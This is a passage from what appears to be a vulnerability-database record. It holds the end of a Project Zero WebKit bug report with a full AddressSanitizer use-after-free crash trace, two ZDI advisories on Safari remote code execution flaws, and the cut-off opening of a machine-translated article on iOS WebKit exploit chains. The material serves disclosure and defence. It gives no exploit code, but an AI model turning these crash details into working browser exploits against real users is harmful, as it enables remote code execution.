WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d) \n#18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8) \n#19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe) \n#20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b) \n#21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040) \n#22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3) \n#23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476) \n#24 0x10c922b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08) \n#25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044) \n#26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1) \n#27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57) \n#28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d) \n#29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce) \n#30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5) \n#31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae) \n#32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602) \n#33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297) \n#34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1) \n#35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n#44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) \n#45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) \n#46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) \n#47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) \n#48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) \n#49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) \n#50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) \n#51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) \n#52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) \n#53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) \n#54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) \n#55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) \n#56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) \n#57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) \n#58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) \n#59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) \n#60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) \n \n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8) \nfreed by thread T0 here: \n#0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) \n#1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30) \n#2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83) \n#3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892) \n#4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d) \n#5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99) \n#6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d) \n#7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83) \n#8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892) \n#9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d) \n#10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118) \n#11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f) \n#12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2) \n#13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd) \n#14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c) \n#15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d) \n#16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74) \n#17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9) \n#18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da) \n#19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9) \n#20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724) \n#21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b) \n#22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439) \n#23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d) \n#24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8) \n#25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe) \n#26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b) \n#27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040) \n#28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3) \n#29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476) \n \npreviously allocated by thread T0 here: \n#0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) \n#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) \n#2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) \n#3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) \n#4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) \n#5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) \n#6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08) \n#7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d) \n#8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3) \n#9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4) \n#10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9) \n#11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17) \n#12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504) \n#13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4) \n#14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43) \n#15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e) \n#16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba) \n#17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779) \n#18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6) \n#19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e) \n#20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351) \n#21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d) \n#22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n \nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const \nShadow bytes around the buggy address: \n0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa \n0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd \n0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd \n0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa \n0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd \n=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd \n0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa \n0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd \n0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 \n0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa \n0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nFreed heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nContainer overflow: fc \nArray cookie: ac \nIntra object redzone: bb \nASan internal: fe \nLeft alloca redzone: ca \nRight alloca redzone: cb \n==29516==ABORTING \n================================================================= \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143483/GS20170725050029.txt"}], "zdi": [{"lastseen": "2020-06-22T11:40:50", "bulletinFamily": "info", "cvelist": ["CVE-2017-2538"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of cached stylesheets. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2017-06-22T00:00:00", "published": "2017-05-18T00:00:00", "id": "ZDI-17-362", "href": "https://www.zerodayinitiative.com/advisories/ZDI-17-362/", "title": "(Pwn2Own) Apple Safari ProcessingInstruction Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:41:37", "bulletinFamily": "info", "cvelist": ["CVE-2017-7052"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Frame objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2017-06-22T00:00:00", "published": "2017-07-19T00:00:00", "id": "ZDI-17-489", "href": "https://www.zerodayinitiative.com/advisories/ZDI-17-489/", "title": "Apple Safari Frame Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-09-17T10:34:08", "bulletinFamily": "info", "cvelist": ["CVE-2019-8518", "CVE-2017-7064", "CVE-2018-4438", "CVE-2017-2505", "CVE-2018-17463", "CVE-2018-4122"], "description": "In this article, we will Analysis on your iOS device to get the normal permissions of the shell of the WebKit exploit method, where all the vulnerabilities are available on iOS's sandboxed renderer process WebContent implemented shellcode code execution. Although on iOS Chrome will also be affected by these browser vulnerabilities to attack, but the attacker would just use them to locate the Safari and the iPhone's location. \nThis article will first briefly describe each use of the WebKit vulnerabilities and an attacker how from build a memory read/write primitives, and then outlines for shellcode code execution techniques as well as how to bypass the existing JIT code injection mitigation measures. \nInterestingly, these vulnerabilities do not have a vulnerability to 